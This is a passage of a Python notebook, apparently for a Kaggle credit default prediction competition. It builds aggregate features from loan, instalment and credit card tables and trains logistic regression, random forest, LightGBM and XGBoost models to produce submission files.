(total_payment/prev['AMT_CREDIT'] - 1)/prev['CNT_PAYMENT']", "_____no_output_____" ], [ "approved = prev[prev['NAME_CONTRACT_STATUS_Approved'] == 1]\nactive_df = approved[approved['DAYS_LAST_DUE'] == 365243]\nactive_pay = pay[pay['SK_ID_PREV'].isin(active_df['SK_ID_PREV'])]\nactive_pay_agg = active_pay.groupby('SK_ID_PREV')[['AMT_INSTALMENT', 'AMT_PAYMENT']].sum()\nactive_pay_agg.reset_index(inplace= True)\nactive_pay_agg['INSTALMENT_PAYMENT_DIFF'] = active_pay_agg['AMT_INSTALMENT'] - active_pay_agg['AMT_PAYMENT']\nactive_df = active_df.merge(active_pay_agg, on= 'SK_ID_PREV', how= 'left')\nactive_df['REMAINING_DEBT'] = active_df['AMT_CREDIT'] - active_df['AMT_PAYMENT']\nactive_df['REPAYMENT_RATIO'] = active_df['AMT_PAYMENT'] / active_df['AMT_CREDIT']\nactive_agg_df = group(active_df, 'PREV_ACTIVE_', PREVIOUS_ACTIVE_AGG)\nactive_agg_df['TOTAL_REPAYMENT_RATIO'] = active_agg_df['PREV_ACTIVE_AMT_PAYMENT_SUM']/\\\n active_agg_df['PREV_ACTIVE_AMT_CREDIT_SUM']\ndel active_pay, active_pay_agg, active_df; gc.collect()", "_____no_output_____" ], [ "prev['DAYS_FIRST_DRAWING'].replace(365243, np.nan, inplace= True)\nprev['DAYS_FIRST_DUE'].replace(365243, np.nan, inplace= True)\nprev['DAYS_LAST_DUE_1ST_VERSION'].replace(365243, np.nan, inplace= True)\nprev['DAYS_LAST_DUE'].replace(365243, np.nan, inplace= True)\nprev['DAYS_TERMINATION'].replace(365243, np.nan, inplace= True)", "_____no_output_____" ], [ "prev['DAYS_LAST_DUE_DIFF'] = prev['DAYS_LAST_DUE_1ST_VERSION'] - prev['DAYS_LAST_DUE']\napproved['DAYS_LAST_DUE_DIFF'] = approved['DAYS_LAST_DUE_1ST_VERSION'] - approved['DAYS_LAST_DUE']", "_____no_output_____" ], [ "categorical_agg = {key: ['mean'] for key in categorical_cols}", "_____no_output_____" ], [ "agg_prev = group(prev, 'PREV_', {**PREVIOUS_AGG, **categorical_agg})\nagg_prev = agg_prev.merge(active_agg_df, how='left', on='SK_ID_CURR')\ndel active_agg_df; gc.collect()", "_____no_output_____" ], [ "agg_prev = group_and_merge(approved, agg_prev, 'APPROVED_', PREVIOUS_APPROVED_AGG)\nrefused = prev[prev['NAME_CONTRACT_STATUS_Refused'] == 1]\nagg_prev = group_and_merge(refused, agg_prev, 'REFUSED_', PREVIOUS_REFUSED_AGG)\ndel approved, refused; gc.collect()", "_____no_output_____" ], [ "for loan_type in ['Consumer loans', 'Cash loans']:\n type_df = prev[prev['NAME_CONTRACT_TYPE_{}'.format(loan_type)] == 1]\n prefix = 'PREV_' + loan_type.split(\" \")[0] + '_'\n agg_prev = group_and_merge(type_df, agg_prev, prefix, PREVIOUS_LOAN_TYPE_AGG)\n del type_df; gc.collect()", "_____no_output_____" ], [ "pay['LATE_PAYMENT'] = pay['DAYS_ENTRY_PAYMENT'] - pay['DAYS_INSTALMENT']\npay['LATE_PAYMENT'] = pay['LATE_PAYMENT'].apply(lambda x: 1 if x > 0 else 0)\ndpd_id = pay[pay['LATE_PAYMENT'] > 0]['SK_ID_PREV'].unique()", "_____no_output_____" ], [ "agg_dpd = group_and_merge(prev[prev['SK_ID_PREV'].isin(dpd_id)], agg_prev,\n 'PREV_LATE_', PREVIOUS_LATE_PAYMENTS_AGG)\ndel agg_dpd, dpd_id; gc.collect()", "_____no_output_____" ], [ "for time_frame in [12, 24]:\n time_frame_df = prev[prev['DAYS_DECISION'] >= -30*time_frame]\n prefix = 'PREV_LAST{}M_'.format(time_frame)\n agg_prev = group_and_merge(time_frame_df, agg_prev, prefix, PREVIOUS_TIME_AGG)\n del time_frame_df; gc.collect()\ndel prev; gc.collect()", "_____no_output_____" ], [ "df = pd.merge(df, agg_prev, on='SK_ID_CURR', how='left')\ndel agg_prev; gc.collect()", "_____no_output_____" ], [ "pos = pd.read_csv(os.path.join(DATA_DIRECTORY, 'POS_CASH_balance.csv'))\npos, categorical_cols = one_hot_encoder(pos, nan_as_category= False)", "_____no_output_____" ], [ "pos['LATE_PAYMENT'] = pos['SK_DPD'].apply(lambda x: 1 if x > 0 else 0)", "_____no_output_____" ], [ "POS_CASH_AGG = {\n 'SK_ID_PREV': ['nunique'],\n 'MONTHS_BALANCE': ['min', 'max', 'size'],\n 'SK_DPD': ['max', 'mean', 'sum', 'var'],\n 'SK_DPD_DEF': ['max', 'mean', 'sum'],\n 'LATE_PAYMENT': ['mean']\n}\n\ncategorical_agg = {key: ['mean'] for key in categorical_cols}\npos_agg = group(pos, 'POS_', {**POS_CASH_AGG, **categorical_agg})", "_____no_output_____" ], [ "sort_pos = pos.sort_values(by=['SK_ID_PREV', 'MONTHS_BALANCE'])\ngp = sort_pos.groupby('SK_ID_PREV')\ntemp = pd.DataFrame()\ntemp['SK_ID_CURR'] = gp['SK_ID_CURR'].first()\ntemp['MONTHS_BALANCE_MAX'] = gp['MONTHS_BALANCE'].max()", "_____no_output_____" ], [ "temp['POS_LOAN_COMPLETED_MEAN'] = gp['NAME_CONTRACT_STATUS_Completed'].mean()\ntemp['POS_COMPLETED_BEFORE_MEAN'] = gp['CNT_INSTALMENT'].first() - gp['CNT_INSTALMENT'].last()\ntemp['POS_COMPLETED_BEFORE_MEAN'] = temp.apply(lambda x: 1 if x['POS_COMPLETED_BEFORE_MEAN'] > 0\n and x['POS_LOAN_COMPLETED_MEAN'] > 0 else 0, axis=1)", "_____no_output_____" ], [ "temp['POS_REMAINING_INSTALMENTS'] = gp['CNT_INSTALMENT_FUTURE'].last()\ntemp['POS_REMAINING_INSTALMENTS_RATIO'] = gp['CNT_INSTALMENT_FUTURE'].last()/gp['CNT_INSTALMENT'].last()", "_____no_output_____" ], [ "temp_gp = temp.groupby('SK_ID_CURR').sum().reset_index()\ntemp_gp.drop(['MONTHS_BALANCE_MAX'], axis=1, inplace= True)\npos_agg = pd.merge(pos_agg, temp_gp, on= 'SK_ID_CURR', how= 'left')\ndel temp, gp, temp_gp, sort_pos; gc.collect()", "_____no_output_____" ], [ "pos = do_sum(pos, ['SK_ID_PREV'], 'LATE_PAYMENT', 'LATE_PAYMENT_SUM')", "_____no_output_____" ], [ "last_month_df = pos.groupby('SK_ID_PREV')['MONTHS_BALANCE'].idxmax()", "_____no_output_____" ], [ "sort_pos = pos.sort_values(by=['SK_ID_PREV', 'MONTHS_BALANCE'])\ngp = sort_pos.iloc[last_month_df].groupby('SK_ID_CURR').tail(3)\ngp_mean = gp.groupby('SK_ID_CURR').mean().reset_index()\npos_agg = pd.merge(pos_agg, gp_mean[['SK_ID_CURR','LATE_PAYMENT_SUM']], on='SK_ID_CURR', how='left')", "_____no_output_____" ], [ "drop_features = [\n 'POS_NAME_CONTRACT_STATUS_Canceled_MEAN', 'POS_NAME_CONTRACT_STATUS_Amortized debt_MEAN',\n 'POS_NAME_CONTRACT_STATUS_XNA_MEAN']\npos_agg.drop(drop_features, axis=1, inplace=True)", "_____no_output_____" ], [ "df = pd.merge(df, pos_agg, on='SK_ID_CURR', how='left')", "_____no_output_____" ], [ "pay = do_sum(pay, ['SK_ID_PREV', 'NUM_INSTALMENT_NUMBER'], 'AMT_PAYMENT', 'AMT_PAYMENT_GROUPED')\npay['PAYMENT_DIFFERENCE'] = pay['AMT_INSTALMENT'] - pay['AMT_PAYMENT_GROUPED']\npay['PAYMENT_RATIO'] = pay['AMT_INSTALMENT'] / pay['AMT_PAYMENT_GROUPED']\npay['PAID_OVER_AMOUNT'] = pay['AMT_PAYMENT'] - pay['AMT_INSTALMENT']\npay['PAID_OVER'] = (pay['PAID_OVER_AMOUNT'] > 0).astype(int)", "_____no_output_____" ], [ "pay['DPD'] = pay['DAYS_ENTRY_PAYMENT'] - pay['DAYS_INSTALMENT']\npay['DPD'] = pay['DPD'].apply(lambda x: 0 if x <= 0 else x)\npay['DBD'] = pay['DAYS_INSTALMENT'] - pay['DAYS_ENTRY_PAYMENT']\npay['DBD'] = pay['DBD'].apply(lambda x: 0 if x <= 0 else x)", "_____no_output_____" ], [ "pay['LATE_PAYMENT'] = pay['DBD'].apply(lambda x: 1 if x > 0 else 0)", "_____no_output_____" ], [ "pay['INSTALMENT_PAYMENT_RATIO'] = pay['AMT_PAYMENT'] / pay['AMT_INSTALMENT']\npay['LATE_PAYMENT_RATIO'] = pay.apply(lambda x: x['INSTALMENT_PAYMENT_RATIO'] if x['LATE_PAYMENT'] == 1 else 0, axis=1)", "_____no_output_____" ], [ "pay['SIGNIFICANT_LATE_PAYMENT'] = pay['LATE_PAYMENT_RATIO'].apply(lambda x: 1 if x > 0.05 else 0)", "_____no_output_____" ], [ "pay['DPD_7'] = pay['DPD'].apply(lambda x: 1 if x >= 7 else 0)\npay['DPD_15'] = pay['DPD'].apply(lambda x: 1 if x >= 15 else 0)", "_____no_output_____" ], [ "INSTALLMENTS_AGG = {\n 'SK_ID_PREV': ['size', 'nunique'],\n 'DAYS_ENTRY_PAYMENT': ['min', 'max', 'mean'],\n 'AMT_INSTALMENT': ['min', 'max', 'mean', 'sum'],\n 'AMT_PAYMENT': ['min', 'max', 'mean', 'sum'],\n 'DPD': ['max', 'mean', 'var'],\n 'DBD': ['max', 'mean', 'var'],\n 'PAYMENT_DIFFERENCE': ['mean'],\n 'PAYMENT_RATIO': ['mean'],\n 'LATE_PAYMENT': ['mean', 'sum'],\n 'SIGNIFICANT_LATE_PAYMENT': ['mean', 'sum'],\n 'LATE_PAYMENT_RATIO': ['mean'],\n 'DPD_7': ['mean'],\n 'DPD_15': ['mean'],\n 'PAID_OVER': ['mean']\n}\n\npay_agg = group(pay, 'INS_', INSTALLMENTS_AGG)", "_____no_output_____" ], [ "INSTALLMENTS_TIME_AGG = {\n 'SK_ID_PREV': ['size'],\n 'DAYS_ENTRY_PAYMENT': ['min', 'max', 'mean'],\n 'AMT_INSTALMENT': ['min', 'max', 'mean', 'sum'],\n 'AMT_PAYMENT': ['min', 'max', 'mean', 'sum'],\n 'DPD': ['max', 'mean', 'var'],\n 'DBD': ['max', 'mean', 'var'],\n 'PAYMENT_DIFFERENCE': ['mean'],\n 'PAYMENT_RATIO': ['mean'],\n 'LATE_PAYMENT': ['mean'],\n 'SIGNIFICANT_LATE_PAYMENT': ['mean'],\n 'LATE_PAYMENT_RATIO': ['mean'],\n 'DPD_7': ['mean'],\n 'DPD_15': ['mean'],\n}\n\nfor months in [36, 60]:\n recent_prev_id = pay[pay['DAYS_INSTALMENT'] >= -30*months]['SK_ID_PREV'].unique()\n pay_recent = pay[pay['SK_ID_PREV'].isin(recent_prev_id)]\n prefix = 'INS_{}M_'.format(months)\n pay_agg = group_and_merge(pay_recent, pay_agg, prefix, INSTALLMENTS_TIME_AGG)", "_____no_output_____" ], [ "def add_features_in_group(features, gr_, feature_name, aggs, prefix):\n for agg in aggs:\n if agg == 'sum':\n features['{}{}_sum'.format(prefix, feature_name)] = gr_[feature_name].sum()\n elif agg == 'mean':\n features['{}{}_mean'.format(prefix, feature_name)] = gr_[feature_name].mean()\n elif agg == 'max':\n features['{}{}_max'.format(prefix, feature_name)] = gr_[feature_name].max()\n elif agg == 'min':\n features['{}{}_min'.format(prefix, feature_name)] = gr_[feature_name].min()\n elif agg == 'std':\n features['{}{}_std'.format(prefix, feature_name)] = gr_[feature_name].std()\n elif agg == 'count':\n features['{}{}_count'.format(prefix, feature_name)] = gr_[feature_name].count()\n elif agg == 'skew':\n features['{}{}_skew'.format(prefix, feature_name)] = skew(gr_[feature_name])\n elif agg == 'kurt':\n features['{}{}_kurt'.format(prefix, feature_name)] = kurtosis(gr_[feature_name])\n elif agg == 'iqr':\n features['{}{}_iqr'.format(prefix, feature_name)] = iqr(gr_[feature_name])\n elif agg == 'median':\n features['{}{}_median'.format(prefix, feature_name)] = gr_[feature_name].median()\n return features", "_____no_output_____" ], [ "def chunk_groups(groupby_object, chunk_size):\n n_groups = groupby_object.ngroups\n group_chunk, index_chunk = [], []\n for i, (index, df) in enumerate(groupby_object):\n group_chunk.append(df)\n index_chunk.append(index)\n if (i + 1) % chunk_size == 0 or i + 1 == n_groups:\n group_chunk_, index_chunk_ = group_chunk.copy(), index_chunk.copy()\n group_chunk, index_chunk = [], []\n yield index_chunk_, group_chunk_", "_____no_output_____" ], [ "def add_trend_feature(features, gr, feature_name, prefix):\n y = gr[feature_name].values\n try:\n x = np.arange(0, len(y)).reshape(-1, 1)\n lr = LinearRegression()\n lr.fit(x, y)\n trend = lr.coef_[0]\n except:\n trend = np.nan\n features['{}{}'.format(prefix, feature_name)] = trend\n return features", "_____no_output_____" ], [ "def parallel_apply(groups, func, index_name='Index', num_workers=0, chunk_size=100000):\n if num_workers <= 0: num_workers = 8\n #n_chunks = np.ceil(1.0 * groups.ngroups / chunk_size)\n indeces, features = [], []\n for index_chunk, groups_chunk in chunk_groups(groups, chunk_size):\n with mp.pool.Pool(num_workers) as executor:\n features_chunk = executor.map(func, groups_chunk)\n features.extend(features_chunk)\n indeces.extend(index_chunk)\n\n features = pd.DataFrame(features)\n features.index = indeces\n features.index.name = index_name\n return features", "_____no_output_____" ], [ "def trend_in_last_k_instalment_features(gr, periods):\n gr_ = gr.copy()\n gr_.sort_values(['DAYS_INSTALMENT'], ascending=False, inplace=True)\n features = {}\n\n for period in periods:\n gr_period = gr_.iloc[:period]\n features = add_trend_feature(features, gr_period, 'DPD',\n '{}_TREND_'.format(period))\n features = add_trend_feature(features, gr_period, 'PAID_OVER_AMOUNT',\n '{}_TREND_'.format(period))\n return features\n\ngroup_features = ['SK_ID_CURR', 'SK_ID_PREV', 'DPD', 'LATE_PAYMENT',\n 'PAID_OVER_AMOUNT', 'PAID_OVER', 'DAYS_INSTALMENT']\ngp = pay[group_features].groupby('SK_ID_CURR')\nfunc = partial(trend_in_last_k_instalment_features, periods=[12, 24, 60, 120])\ng = parallel_apply(gp, func, index_name='SK_ID_CURR', chunk_size=10000).reset_index()\npay_agg = pay_agg.merge(g, on='SK_ID_CURR', how='left')", "_____no_output_____" ], [ "def installments_last_loan_features(gr):\n gr_ = gr.copy()\n gr_.sort_values(['DAYS_INSTALMENT'], ascending=False, inplace=True)\n last_installment_id = gr_['SK_ID_PREV'].iloc[0]\n gr_ = gr_[gr_['SK_ID_PREV'] == last_installment_id]\n\n features = {}\n features = add_features_in_group(features, gr_, 'DPD',\n ['sum', 'mean', 'max', 'std'],\n 'LAST_LOAN_')\n features = add_features_in_group(features, gr_, 'LATE_PAYMENT',\n ['count', 'mean'],\n 'LAST_LOAN_')\n features = add_features_in_group(features, gr_, 'PAID_OVER_AMOUNT',\n ['sum', 'mean', 'max', 'min', 'std'],\n 'LAST_LOAN_')\n features = add_features_in_group(features, gr_, 'PAID_OVER',\n ['count', 'mean'],\n 'LAST_LOAN_')\n return features\n\ng = parallel_apply(gp, installments_last_loan_features, index_name='SK_ID_CURR', chunk_size=10000).reset_index()\npay_agg = pay_agg.merge(g, on='SK_ID_CURR', how='left')", "_____no_output_____" ], [ "df = pd.merge(df, pay_agg, on='SK_ID_CURR', how='left')\ndel pay_agg, gp, pay; gc.collect()", "_____no_output_____" ], [ "cc = pd.read_csv(os.path.join(DATA_DIRECTORY, 'credit_card_balance.csv'))\ncc, cat_cols = one_hot_encoder(cc, nan_as_category=False)\ncc.rename(columns={'AMT_RECIVABLE': 'AMT_RECEIVABLE'}, inplace=True)", "_____no_output_____" ], [ "cc['LIMIT_USE'] = cc['AMT_BALANCE'] / cc['AMT_CREDIT_LIMIT_ACTUAL']", "_____no_output_____" ], [ "cc['PAYMENT_DIV_MIN'] = cc['AMT_PAYMENT_CURRENT'] / cc['AMT_INST_MIN_REGULARITY']", "_____no_output_____" ], [ "cc['LATE_PAYMENT'] = cc['SK_DPD'].apply(lambda x: 1 if x > 0 else 0)", "_____no_output_____" ], [ "cc['DRAWING_LIMIT_RATIO'] = cc['AMT_DRAWINGS_ATM_CURRENT'] / cc['AMT_CREDIT_LIMIT_ACTUAL']", "_____no_output_____" ], [ "CREDIT_CARD_AGG = {\n 'MONTHS_BALANCE': ['min'],\n 'AMT_BALANCE': ['max'],\n 'AMT_CREDIT_LIMIT_ACTUAL': ['max'],\n 'AMT_DRAWINGS_ATM_CURRENT': ['max', 'sum'],\n 'AMT_DRAWINGS_CURRENT': ['max', 'sum'],\n 'AMT_DRAWINGS_POS_CURRENT': ['max', 'sum'],\n 'AMT_INST_MIN_REGULARITY': ['max', 'mean'],\n 'AMT_PAYMENT_TOTAL_CURRENT': ['max', 'mean', 'sum', 'var'],\n 'AMT_TOTAL_RECEIVABLE': ['max', 'mean'],\n 'CNT_DRAWINGS_ATM_CURRENT': ['max', 'mean', 'sum'],\n 'CNT_DRAWINGS_CURRENT': ['max', 'mean', 'sum'],\n 'CNT_DRAWINGS_POS_CURRENT': ['mean'],\n 'SK_DPD': ['mean', 'max', 'sum'],\n 'SK_DPD_DEF': ['max', 'sum'],\n 'LIMIT_USE': ['max', 'mean'],\n 'PAYMENT_DIV_MIN': ['min', 'mean'],\n 'LATE_PAYMENT': ['max', 'sum'],\n}\n\ncc_agg = cc.groupby('SK_ID_CURR').agg(CREDIT_CARD_AGG)\ncc_agg.columns = pd.Index(['CC_' + e[0] + \"_\" + e[1].upper() for e in cc_agg.columns.tolist()])\ncc_agg.reset_index(inplace= True)", "_____no_output_____" ], [ "last_ids = cc.groupby('SK_ID_PREV')['MONTHS_BALANCE'].idxmax()\nlast_months_df = cc[cc.index.isin(last_ids)]\ncc_agg = group_and_merge(last_months_df,cc_agg,'CC_LAST_', {'AMT_BALANCE': ['mean', 'max']})", "_____no_output_____" ], [ "CREDIT_CARD_TIME_AGG = {\n 'CNT_DRAWINGS_ATM_CURRENT': ['mean'],\n 'SK_DPD': ['max', 'sum'],\n 'AMT_BALANCE': ['mean', 'max'],\n 'LIMIT_USE': ['max', 'mean']\n}\n\nfor months in [12, 24, 48]:\n cc_prev_id = cc[cc['MONTHS_BALANCE'] >= -months]['SK_ID_PREV'].unique()\n cc_recent = cc[cc['SK_ID_PREV'].isin(cc_prev_id)]\n prefix = 'INS_{}M_'.format(months)\n cc_agg = group_and_merge(cc_recent, cc_agg, prefix, CREDIT_CARD_TIME_AGG)", "_____no_output_____" ], [ "df = pd.merge(df, cc_agg, on='SK_ID_CURR', how='left')\ndel cc, cc_agg; gc.collect()", "_____no_output_____" ], [ "def add_ratios_features(df):\n df['BUREAU_INCOME_CREDIT_RATIO'] = df['BUREAU_AMT_CREDIT_SUM_MEAN'] / df['AMT_INCOME_TOTAL']\n df['BUREAU_ACTIVE_CREDIT_TO_INCOME_RATIO'] = df['BUREAU_ACTIVE_AMT_CREDIT_SUM_SUM'] / df['AMT_INCOME_TOTAL']\n df['CURRENT_TO_APPROVED_CREDIT_MIN_RATIO'] = df['APPROVED_AMT_CREDIT_MIN'] / df['AMT_CREDIT']\n df['CURRENT_TO_APPROVED_CREDIT_MAX_RATIO'] = df['APPROVED_AMT_CREDIT_MAX'] / df['AMT_CREDIT']\n df['CURRENT_TO_APPROVED_CREDIT_MEAN_RATIO'] = df['APPROVED_AMT_CREDIT_MEAN'] / df['AMT_CREDIT']\n df['CURRENT_TO_APPROVED_ANNUITY_MAX_RATIO'] = df['APPROVED_AMT_ANNUITY_MAX'] / df['AMT_ANNUITY']\n df['CURRENT_TO_APPROVED_ANNUITY_MEAN_RATIO'] = df['APPROVED_AMT_ANNUITY_MEAN'] / df['AMT_ANNUITY']\n df['PAYMENT_MIN_TO_ANNUITY_RATIO'] = df['INS_AMT_PAYMENT_MIN'] / df['AMT_ANNUITY']\n df['PAYMENT_MAX_TO_ANNUITY_RATIO'] = df['INS_AMT_PAYMENT_MAX'] / df['AMT_ANNUITY']\n df['PAYMENT_MEAN_TO_ANNUITY_RATIO'] = df['INS_AMT_PAYMENT_MEAN'] / df['AMT_ANNUITY']\n df['CTA_CREDIT_TO_ANNUITY_MAX_RATIO'] = df['APPROVED_CREDIT_TO_ANNUITY_RATIO_MAX'] / df[\n 'CREDIT_TO_ANNUITY_RATIO']\n df['CTA_CREDIT_TO_ANNUITY_MEAN_RATIO'] = df['APPROVED_CREDIT_TO_ANNUITY_RATIO_MEAN'] / df[\n 'CREDIT_TO_ANNUITY_RATIO']\n df['DAYS_DECISION_MEAN_TO_BIRTH'] = df['APPROVED_DAYS_DECISION_MEAN'] / df['DAYS_BIRTH']\n df['DAYS_CREDIT_MEAN_TO_BIRTH'] = df['BUREAU_DAYS_CREDIT_MEAN'] / df['DAYS_BIRTH']\n df['DAYS_DECISION_MEAN_TO_EMPLOYED'] = df['APPROVED_DAYS_DECISION_MEAN'] / df['DAYS_EMPLOYED']\n df['DAYS_CREDIT_MEAN_TO_EMPLOYED'] = df['BUREAU_DAYS_CREDIT_MEAN'] / df['DAYS_EMPLOYED']\n return df", "_____no_output_____" ], [ "df = add_ratios_features(df)", "_____no_output_____" ], [ "df.replace([np.inf, -np.inf], np.nan, inplace=True)", "_____no_output_____" ], [ "train = df[df['TARGET'].notnull()]\ntest = df[df['TARGET'].isnull()]\ndel df\ngc.collect()", "_____no_output_____" ], [ "labels = train['TARGET']\ntrain = train.drop(columns=['TARGET'])\ntest = test.drop(columns=['TARGET'])", "_____no_output_____" ], [ "feature = list(train.columns)\n\ntest_df = test.copy()\ntrain_df = train.copy()\ntrain_df['TARGET'] = labels", "_____no_output_____" ], [ "imputer = SimpleImputer(strategy = 'median')\nimputer.fit(train)\ntrain = imputer.transform(train)\ntest = imputer.transform(test)", "_____no_output_____" ], [ "scaler = MinMaxScaler(feature_range = (0, 1))\nscaler.fit(train)\ntrain = scaler.transform(train)\ntest = scaler.transform(test)", "_____no_output_____" ], [ "log_reg = LogisticRegression(C = 0.0001)\nlog_reg.fit(train, labels)", "_____no_output_____" ], [ "log_reg_pred = log_reg.predict_proba(test)[:, 1]", "_____no_output_____" ], [ "submit = test_df[['SK_ID_CURR']]\nsubmit['TARGET'] = log_reg_pred", "_____no_output_____" ], [ "submit.to_csv('log_reg.csv', index = False)", "_____no_output_____" ], [ "random_forest = RandomForestClassifier(n_estimators = 100, random_state = 50, verbose = 1, n_jobs = -1)\nrandom_forest.fit(train, labels)", "_____no_output_____" ], [ "predictions = random_forest.predict_proba(test)[:, 1]\ndel train, test\ngc.collect()", "_____no_output_____" ], [ "submit = test_df[['SK_ID_CURR']]\nsubmit['TARGET'] = predictions\ndel predictions\nsubmit.to_csv('random_forest.csv', index = False)\ndel submit\ngc.collect()", "_____no_output_____" ], [ "# Ref: https://pranaysite.netlify.app/lightgbm/\n\ndef model(features, test_features, encoding = 'ohe', n_folds = 5):\n \n \"\"\"Train and test a light gradient boosting model using\n cross validation. \n \n Parameters\n --------\n features (pd.DataFrame): \n dataframe of training features to use \n for training a model. Must include the TARGET column.\n test_features (pd.DataFrame): \n dataframe of testing features to use\n for making predictions with the model. \n encoding (str, default = 'ohe'): \n method for encoding categorical variables. Either 'ohe' for one-hot encoding or 'le' for integer label encoding\n n_folds (int, default = 5): number of folds to use for cross validation\n \n Return\n --------\n submission (pd.DataFrame): \n dataframe with `SK_ID_CURR` and `TARGET` probabilities\n predicted by the model.\n feature_importances (pd.DataFrame): \n dataframe with the feature importances from the model.\n valid_metrics (pd.DataFrame): \n dataframe with training and validation metrics (ROC AUC) for each fold and overall.\n \n \"\"\"\n \n # Extract the ids\n train_ids = features['SK_ID_CURR']\n test_ids = test_features['SK_ID_CURR']\n \n # Extract the labels for training\n labels = features['TARGET']\n \n # Remove the ids and target\n features = features.drop(columns = ['SK_ID_CURR', 'TARGET'])\n test_features = test_features.drop(columns = ['SK_ID_CURR'])\n \n \n # One Hot Encoding\n if encoding == 'ohe':\n features = pd.get_dummies(features)\n test_features = pd.get_dummies(test_features)\n \n # Align the dataframes by the columns\n features, test_features = features.align(test_features, join = 'inner', axis = 1)\n \n # No categorical indices to record\n cat_indices = 'auto'\n \n # Integer label encoding\n elif encoding == 'le':\n \n # Create a label encoder\n label_encoder = LabelEncoder()\n \n # List for storing categorical indices\n cat_indices = []\n \n # Iterate through each column\n for i, col in enumerate(features):\n if features[col].dtype == 'object':\n # Map the categorical features to integers\n features[col] = label_encoder.fit_transform(np.array(features[col].astype(str)).reshape((-1,)))\n test_features[col] = label_encoder.transform(np.array(test_features[col].astype(str)).reshape((-1,)))\n\n # Record the categorical indices\n cat_indices.append(i)\n \n # Catch error if label encoding scheme is not valid\n else:\n raise ValueError(\"Encoding must be either 'ohe' or 'le'\")\n \n print('Training Data Shape: ', features.shape)\n print('Testing Data Shape: ', test_features.shape)\n \n # Extract feature names\n feature_names = list(features.columns)\n \n # Convert to np arrays\n features = np.array(features)\n test_features = np.array(test_features)\n \n # Create the kfold object\n k_fold = KFold(n_splits = n_folds, shuffle = True, random_state = 50)\n \n # Empty array for feature importances\n feature_importance_values = np.zeros(len(feature_names))\n \n # Empty array for test predictions\n test_predictions = np.zeros(test_features.shape[0])\n \n # Empty array for out of fold validation predictions\n out_of_fold = np.zeros(features.shape[0])\n \n # Lists for recording validation and training scores\n valid_scores = []\n train_scores = []\n \n # Iterate through each fold\n for train_indices, valid_indices in k_fold.split(features):\n \n # Training data for the fold\n train_features, train_labels = features[train_indices], labels[train_indices]\n # Validation data for the fold\n valid_features, valid_labels = features[valid_indices], labels[valid_indices]\n \n # Create the model\n model = lgb.LGBMClassifier(n_estimators=10000, objective = 'binary', \n class_weight = 'balanced', learning_rate = 0.05, \n reg_alpha = 0.1, reg_lambda = 0.1, \n subsample = 0.8, n_jobs = -1, random_state = 50)\n \n # Train the model\n model.fit(train_features, train_labels, eval_metric = 'auc',\n eval_set = [(valid_features, valid_labels), (train_features, train_labels)],\n eval_names = ['valid', 'train'], categorical_feature = cat_indices,\n early_stopping_rounds = 100, verbose = 200)\n \n # Record the best iteration\n best_iteration = model.best_iteration_\n \n # Record the feature importances\n feature_importance_values += model.feature_importances_ / k_fold.n_splits\n \n # Make predictions\n test_predictions += model.predict_proba(test_features, num_iteration = best_iteration)[:, 1] / k_fold.n_splits\n \n # Record the out of fold predictions\n out_of_fold[valid_indices] = model.predict_proba(valid_features, num_iteration = best_iteration)[:, 1]\n \n # Record the best score\n valid_score = model.best_score_['valid']['auc']\n train_score = model.best_score_['train']['auc']\n \n valid_scores.append(valid_score)\n train_scores.append(train_score)\n \n # Clean up memory\n gc.enable()\n del model, train_features, valid_features\n gc.collect()\n \n # Make the submission dataframe\n submission = pd.DataFrame({'SK_ID_CURR': test_ids, 'TARGET': test_predictions})\n \n # Make the feature importance dataframe\n feature_importances = pd.DataFrame({'feature': feature_names, 'importance': feature_importance_values})\n \n # Overall validation score\n valid_auc = roc_auc_score(labels, out_of_fold)\n \n # Add the overall scores to the metrics\n valid_scores.append(valid_auc)\n train_scores.append(np.mean(train_scores))\n \n # Needed for creating dataframe of validation scores\n fold_names = list(range(n_folds))\n fold_names.append('overall')\n \n # Dataframe of validation scores\n metrics = pd.DataFrame({'fold': fold_names,\n 'train': train_scores,\n 'valid': valid_scores}) \n \n return submission, feature_importances, metrics", "_____no_output_____" ], [ "submission, fi, metrics = model(train_df, test_df, n_folds=5)\nprint('LightGBM metrics')\nprint(metrics)", "_____no_output_____" ], [ "def plot_feature_importances(df):\n \"\"\"\n Plot importances returned by a model. This can work with any measure of\n feature importance provided that higher importance is better. \n \n Args:\n df (dataframe): feature importances. Must have the features in a column\n called `features` and the importances in a column called `importance\n \n Returns:\n shows a plot of the 15 most importance features\n \n df (dataframe): feature importances sorted by importance (highest to lowest) \n with a column for normalized importance\n \"\"\"\n \n # Sort features according to importance\n df = df.sort_values('importance', ascending = False).reset_index()\n \n # Normalize the feature importances to add up to one\n df['importance_normalized'] = df['importance'] / df['importance'].sum()\n\n # Make a horizontal bar chart of feature importances\n plt.figure(figsize = (10, 6))\n ax = plt.subplot()\n \n # Need to reverse the index to plot most important on top\n ax.barh(list(reversed(list(df.index[:15]))), \n df['importance_normalized'].head(15), \n align = 'center', edgecolor = 'k')\n \n # Set the yticks and labels\n ax.set_yticks(list(reversed(list(df.index[:15]))))\n ax.set_yticklabels(df['feature'].head(15))\n \n # Plot labeling\n plt.xlabel('Normalized Importance'); plt.title('Feature Importances')\n plt.show()\n \n return df", "_____no_output_____" ], [ "fi_sorted = plot_feature_importances(fi)", "_____no_output_____" ], [ "submission.to_csv('lgb.csv', index = False)\ndel submission, fi, fi_sorted, metrics\ngc.collect()", "_____no_output_____" ], [ "train_values = labels\ntrain_id = train_df['SK_ID_CURR']\ntest_id = test_df['SK_ID_CURR']\n\ntrain_df_xg = train_df.copy()\ntest_df_xg = test_df.copy()\n\ntrain_df_xg.drop('SK_ID_CURR', inplace=True, axis=1)\ntest_df_xg.drop('SK_ID_CURR', inplace=True, axis=1)\n\ntrain_df_xg, test_df_xg = train_df_xg.align(test_df_xg, join = 'inner', axis = 1)\n\nratio = (train_values == 0).sum()/ (train_values == 1).sum()\ndel train_df, test_df\ngc.collect()", "_____no_output_____" ], [ "X_train, X_test, y_train, y_test = train_test_split(train_df_xg, train_values, test_size=0.2, stratify=train_values, random_state=1)", "_____no_output_____" ], [ "clf = XGBClassifier(n_estimators=1200, objective='binary:logistic', gamma=0.098, subsample=0.5, scale_pos_weight=ratio )\nclf.fit(X_train, y_train, eval_set=[(X_test, y_test)], eval_metric='auc', early_stopping_rounds=10)", "_____no_output_____" ], [ "predictions = clf.predict_proba(test_df_xg.values)[:, 1]\nsubmission = pd.DataFrame({'SK_ID_CURR': test_id.values, 'TARGET': predictions})\nsubmission.to_csv('xgboost.csv', index = False)", "_____no_output_____" ], [ "!kaggle competitions submit 